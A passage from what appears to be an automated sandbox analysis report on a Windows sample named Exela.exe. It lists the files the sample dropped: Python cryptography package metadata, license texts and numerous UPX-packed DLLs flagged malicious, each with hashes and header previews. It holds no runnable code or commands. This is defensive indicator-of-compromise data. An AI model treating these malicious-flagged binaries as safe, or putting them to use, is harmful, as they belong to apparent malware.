                                                                                                  SSDEEP:96:DlkQIUQIhQIKQILbQIRIaMPktjaVMxsxA2ncEvGDfe0HEdwGArNZG0JQTQCQx5Kw:dcPuPwsrcEvGDfe0HENA5w0JQTQ9x59H
                                                                                                  MD5:526D9AC9D8150602EC9ED8B9F4DE7102
                                                                                                  SHA1:DBA2CB32C21C4B0F575E77BBCDD4FA468056F5E3
                                                                                                  SHA-256:D95F491ED418DC302DB03804DAF9335CE21B2DF4704587E6851EF03E1F84D895
                                                                                                  SHA-512:FB13A2F6B64CB7E380A69424D484FC9B8758FA316A7A155FF062BFDACDCA8F2C5D2A03898CD099688B1C16A5A0EDCECFC42BF0D4D330926B10C3FCE9F5238643
                                                                                                  Malicious:false
                                                                                                  Preview:Metadata-Version: 2.3.Name: cryptography.Version: 44.0.0.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16380
                                                                                                  Entropy (8bit):5.58935582120211
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:hXr1We/l45jEVeK6tkhX/v4WJr6W51HepPNIq+NX6ih5VBUqw8q:hXzlMEVdX/9Jr6W51HepPN/+96ihI8q
                                                                                                  MD5:F15EF7175220C9F59F90BBBAEDA16DBD
                                                                                                  SHA1:5367CAC8814D7A54E1C0274FF3F651ED5C6FE5D6
                                                                                                  SHA-256:04DB3839C853D4164576122B7D5A2BAB186536DC8F9A4980385E11CF59946114
                                                                                                  SHA-512:BB0FA967E03D98B9611006DF2155BD8AD58A0E8B1A679D636B94CE931D316F18B61B801E018DECA90D8E5A35FA744AE8C9E1A36F25C791052008C43AF53A8117
                                                                                                  Malicious:false
                                                                                                  Preview:cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-310.pyc,,..cryptography/__pycache__/__init__.cpython-310
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):94
                                                                                                  Entropy (8bit):5.0373614967294325
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
                                                                                                  MD5:A868F93FCF51C4F1C25658D54F994349
                                                                                                  SHA1:535C88A10911673DEABB7889D365E81729E483A6
                                                                                                  SHA-256:1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
                                                                                                  SHA-512:EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
                                                                                                  Malicious:false
                                                                                                  Preview:Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):197
                                                                                                  Entropy (8bit):4.61968998873571
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                  MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                  SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                  SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                  SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                  Malicious:false
                                                                                                  Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11360
                                                                                                  Entropy (8bit):4.426756947907149
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                  MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                  SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                  SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                  SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                  Malicious:false
                                                                                                  Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1532
                                                                                                  Entropy (8bit):5.058591167088024
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                  MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                  SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                  SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                  SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                  Malicious:false
                                                                                                  Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2095616
                                                                                                  Entropy (8bit):7.999632528400969
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:49152:ZyU0K1fB/DWgF/3hdf/+SOzv+KWi7E2OsnE0hupVpj9dburlI3zNlk6gl:MU08RW83zOnT+KWihOtlDwzl
                                                                                                  MD5:606A84AF5A9CF8AD3CB0314E77FB7209
                                                                                                  SHA1:6DE88D8554488FFE3E48C9B14886DA16D1703A69
                                                                                                  SHA-256:0693FFA4990FA8C1664485F3D2A41B581EAC0B340D07D62242052A67BF2ED5C3
                                                                                                  SHA-512:97D451F025AEFB487C5CEA568EB430356ADFE23908321F1C04F8FA4C03DF87507EDA8D9612C944BE4FA733DF4CEC38A0E37BFFD8865088064B749244D4321B1F
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.j...j...j....F..j.......j.......j.......j.......j.......j.......j...j...h.......i...j...j.......j.......j..Rich.j..........................PE..d....^Gg.........." ...*.........._......._...............................................`.............................................X.....................y................$...........................0...(......@...........................................UPX0......_.............................UPX1.........._.....................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):37376
                                                                                                  Entropy (8bit):7.820614402989937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:DR5NQnY+H236BVyqRLjqutCwYUw/8WM+6OxWF1pJ+:jNQRWKBcIqgpw/2+Ngz
                                                                                                  MD5:219AD30AEA7630A3696DF28231405927
                                                                                                  SHA1:EBAF69903305EA0803570CC2FF4CF43DD2BC812A
                                                                                                  SHA-256:06D38127DE4CBD3243F861EA22897D490520E913F77011A37D915C4992433604
                                                                                                  SHA-512:72EB7323DEB26931EA000690F85272EE71E19B2896AF2B43CCD8BCFC3A299E0F8A7A3F1E339FBFE7C855E081CD94E21AE09BA3B8E2D16DBACDDB838C31B4DE13
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.56..f6..f6..f?.Ef2..f&5.g4..f}..g4..f&5.g5..f&5.g>..f&5.g;..f...g5..f6..f...f}4.g7..f}4.g7..f}4)f7..f}4.g7..fRich6..f........PE..d...V..g.........." ...).........0.......@................................................`.............................................h....................p..|.......................................................@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1189728
                                                                                                  Entropy (8bit):7.945107908450931
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:LffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:rf8JWwgho5HL3fknPSIKorCU1CPwDv3a
                                                                                                  MD5:86CFC84F8407AB1BE6CC64A9702882EF
                                                                                                  SHA1:86F3C502ED64DF2A5E10B085103C2FFC9E3A4130
                                                                                                  SHA-256:11B89CC5531B2A6B89FBBB406EBE8FB01F0BF789E672131B0354E10F9E091307
                                                                                                  SHA-512:B33F59497127CB1B4C1781693380576187C562563A9E367CE8ABC14C97C51053A28AF559CDD8BD66181012083E562C8A8771E3D46ADEBA269A848153A8E9173C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24088
                                                                                                  Entropy (8bit):7.527291720504194
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:9RZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:fwlGuUm2Evb1p07pWDG4yKRF
                                                                                                  MD5:D50EBF567149EAD9D88933561CB87D09
                                                                                                  SHA1:171DF40E4187EBBFDF9AA1D76A33F769FB8A35ED
                                                                                                  SHA-256:6AA8E12CE7C8AD52DD2E3FABEB38A726447849669C084EA63D8E322A193033AF
                                                                                                  SHA-512:7BCC9D6D3A097333E1E4B2B23C81EA1B5DB7DBDC5D9D62EBAFFB0FDFB6CFE86161520AC14DC835D1939BE22B9F342531F48DA70F765A60B8E2C3D7B9983021DE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):208224
                                                                                                  Entropy (8bit):7.9214932539909775
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:FSI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:AIek5VC0FiHof6Z1rgJ63R/oS3
                                                                                                  MD5:6CD33578BC5629930329CA3303F0FAE1
                                                                                                  SHA1:F2F8E3248A72F98D27F0CFA0010E32175A18487F
                                                                                                  SHA-256:4150EE603AD2DA7A6CB6A895CB5BD928E3A99AF7E73C604DE1FC224E0809FDB0
                                                                                                  SHA-512:C236A6CCC8577C85509D378C1EF014621CAB6F6F4AA26796FF32D8EEC8E98DED2E55D358A7D236594F7A48646DC2A6BF25B42A37AED549440D52873EBCA4713E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):7.615547793921446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:3fCinCNIw61COjZ0FbIj/jvIUrn+HHRCkmJeZMF50aEB1lr9Za7gJXnkg8:3a1D6vjZd1SxCjeZM0TBhpXk
                                                                                                  MD5:7F691747CE66D3ED05A7C2C53220C8B5
                                                                                                  SHA1:1D3F247042030CF8CF7C859002941BEBA5D15776
                                                                                                  SHA-256:7D6472A0D7F1A0740C7FC0D0D0EA6F7C6E7CB2B11B8C623C46A6FAE1ADB4E228
                                                                                                  SHA-512:B01F0E91039FC5B2782CAAA0B3D56D5D1FE9E94424CC536CDE9ECA73A76747736060042E345AF9EDC5EF5BF5C154705D2C2DDDF35536F305306BE25A955A9F06
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.T.............v?............v........................&{................................S.............Rich............PE..d....|.f.........." ...).P...................................................@............`.........................................@2..d....0..P....0.......................2.......................................&..@...........................................UPX0....................................UPX1.....P.......H..................@....rsrc........0.......L..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32256
                                                                                                  Entropy (8bit):7.761950917364235
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:q3eTOJK2AB2OTsRYYuE5lMbbaNX/H1jA2js+4up5w:q3GO3A5TyYbweaZ1G+4E
                                                                                                  MD5:9FE92ACAE9522CD0044146E1B57C23FA
                                                                                                  SHA1:EC8875039A387BB4AC302CD533B2FE27DBE75B43
                                                                                                  SHA-256:622077D084DB60B50C43A1923D60C02F1900FFFA3B5A11DFD34328E6FD341362
                                                                                                  SHA-512:CDF5DAE191F9B6C75D5698D49D1A55A00695AC896A0823357EA7BF3332683231CB10B1544EC12FAB5CF5A15117A92AF18E1266F29ED3D3CCBCB56FF46A421E88
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V....f..f..f...]..f.....f.`...f.....f.....f.....f.....f..f..f.....f.....f...1..f.....f.Rich.f.................PE..d.....Lg.........." ...*............p.... ................................................`.........................................@...d......P............@..l...................................................p...@...........................................UPX0....................................UPX1......... ...v..................@....rsrc................z..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):88440
                                                                                                  Entropy (8bit):7.916428215878346
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:FqOsxiaMRf0wQhTR0lJrTMQLFrwAx0qHMKVqhgjOE+hpeWpUM2MkNphoacI7QhgR:U8kmJfMQLFD+XWq+aDBplFkKI7QhgB0g
                                                                                                  MD5:46331749084F98BCFE8631D74C5E038F
                                                                                                  SHA1:5E5510F7A4D03F10D979E0D6A0D2A6F0E53CA347
                                                                                                  SHA-256:21CC4B9CCD69D08D7C1068B1F004AE9454F7EA0A322801860FAF0E6F4A24A3DF
                                                                                                  SHA-512:EDD39CE2D927FB6700A86DB07F4F56CAB897EF91A320F3E5ECB542EA1BE6888DD27A08008E5FA1DF3765B0C82D1046A23C8D59E76D11F4E6449D4D6826879589
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9h..}..}..}..tqu.q..2u....2u.p..2u.u..2u.~...u....{.~..}......u.y...u.|...u..|...u.|..Rich}..................PE..d...+..c.........." ...". ........... .......................................@............`..........................................<..P....9.......0.......................<.......................................,..@...........................................UPX0....................................UPX1..... ..........................@....rsrc........0......."..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64896
                                                                                                  Entropy (8bit):6.101810529421494
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:Y88LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJq9:Y8wewnvtjnsfwERI7Q0L7SyCPx
                                                                                                  MD5:C17B7A4B853827F538576F4C3521C653
                                                                                                  SHA1:6115047D02FBBAD4FF32AFB4EBD439F5D529485A
                                                                                                  SHA-256:D21E60F3DFBF2BAB0CC8A06656721FA3347F026DF10297674FC635EBF9559A68
                                                                                                  SHA-512:8E08E702D69DF6840781D174C4565E14A28022B40F650FDA88D60172BE2D4FFD96A3E9426D20718C54072CA0DA27E0455CC0394C098B75E062A27559234A3DF7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]{....e...e...e..fm...e..fe...e..f....e..fg...e.Rich..e.........................PE..d......c.........." ..."..................................................................`.........................................`...`................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1513336
                                                                                                  Entropy (8bit):7.991995760990047
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:24576:omhx0O5yMVUEV51zVZ/7KqaI0jVSn/OCNYLfUehwHqDdt9OJzoCr2TAY/f+TNX59:omT0OjUK51xZ/7s6GDwKDD9OJEwsAE2V
                                                                                                  MD5:FC7BD515B12E537A39DC93A09B3EAAD6
                                                                                                  SHA1:96F5D4B0967372553CB106539C5566BC184F6167
                                                                                                  SHA-256:461E008B7CDF034F99A566671B87849772873A175AEFEC6ED00732976F5C4164
                                                                                                  SHA-512:A8433D5B403F898E4EEEBD72FCE08EBAD066CA60AEB0B70E2AE78377BABC2ACBBAE2AC91AB20F813CCE4B1DC58C2AD6B3868F18CC8AC0FE7BE2BFF020EB73122
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R..R..R...S..R......R...W..R...V..R...Q..R.....R.K.S..R..S..R.'._.X.R.'.R..R.'....R.'.P..R.Rich..R.........PE..d......c.........." ...". ......../...E.../...................................F...........`...........................................F.......F.d.....F.......B...............F.......................................E.@...........................................UPX0....../.............................UPX1..... ..../.....................@....rsrc.........F.....................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24952
                                                                                                  Entropy (8bit):7.392326214954849
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:6m71gl6dfHKsh8Za7gJXpDCI77G26IIYiSy1pCQ0AA7Pxh8E9VF0Nym5ty:J1gl65HKNp5DCI77G2WYiSyv87PxWEgC
                                                                                                  MD5:3797A47A60B606E25348C67043874FE8
                                                                                                  SHA1:63A33FEDFFD52190236A6ACD0FC5D9D491E3AC45
                                                                                                  SHA-256:312E9B01D1632840983E8533D1685A64FB87E4538F724A7A59A71B1BA148BBAC
                                                                                                  SHA-512:3EB7599825B7B21AAAB05E420DD16D4A8EAA21652D232F6E4EDE213A232B701401556E44DF73CFA20AE855D1ADC28304B52D42367B74EBD8E96C2E3D9A9B93E2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):623480
                                                                                                  Entropy (8bit):7.993502110233887
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:MZNIrMyJHzTarSwdWd5Xhm/27cz5hQYuHDiL1IcUq4P8ryHn5+8ybL:UNPsHzTaWwdS5xV70QYMDiCc34e8nI82
                                                                                                  MD5:6A3A34C9C67EFD6C17D44292E8DB8FAD
                                                                                                  SHA1:339B1E514D60D8370EAEC1E2F2B71CEAD999F970
                                                                                                  SHA-256:7B0E840165D65F0F5285476467E4C154C4D936613966B84948110A4614B9CAD9
                                                                                                  SHA-512:6F2A1B670D28762745F0D3B961A331CBBB0DEC244F8798734B911B3A3BC9519C73A3B26F1E1117725F6F1E880E57CADB562A1450659BCA1AAE353F6B9575D7F5
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294784
                                                                                                  Entropy (8bit):7.987175768019268
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:HudZUEjoXwDrGv4qJBd4R0u3FIp6O4LMHS+OsfW/+vzoFZ:8GEjyirGd+f3FIp7eMHS+CUUr
                                                                                                  MD5:FED35DB31377D515D198E5E446498BE2
                                                                                                  SHA1:62E388D17E17208EA0E881CCD96C75B7B1FBC5F7
                                                                                                  SHA-256:AF3CDC9A2A1D923BE67244429867A3C5C70835249E3573A03B98D08D148FE24B
                                                                                                  SHA-512:0985528CB0289086EC895E21A8947E04F732D5660460F2E7FA8668BD441C891438781C808BCEA9294F348720E3752C10EA65363371F7E75EA48600D016BAB72A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):41984
                                                                                                  Entropy (8bit):7.855273475576537
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:l9cI+dPPKdf1F9wj1SWBbDVnK3O047BshaLNL10cOWkuVb70FKKEIpmQ:EPKdUDh0M8mn9kupRKEVQ
                                                                                                  MD5:8640834733897205D9193E1B21084135
                                                                                                  SHA1:E452AE2DBABCC8691233428DD1DA5D23961B047D
                                                                                                  SHA-256:BD209AB04BA8A3A40546832380547A460B1257F4FB4B4012F6FC48F9C36CC476
                                                                                                  SHA-512:365805A31ED3EF7648FA2FAC49FECC0646DD5DFCAD8468918623D962DB6AAB08339F510EDCCDAF1340F8BFC06A4628C070DE947CDEC55CFABDC3563AF2DE43E7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
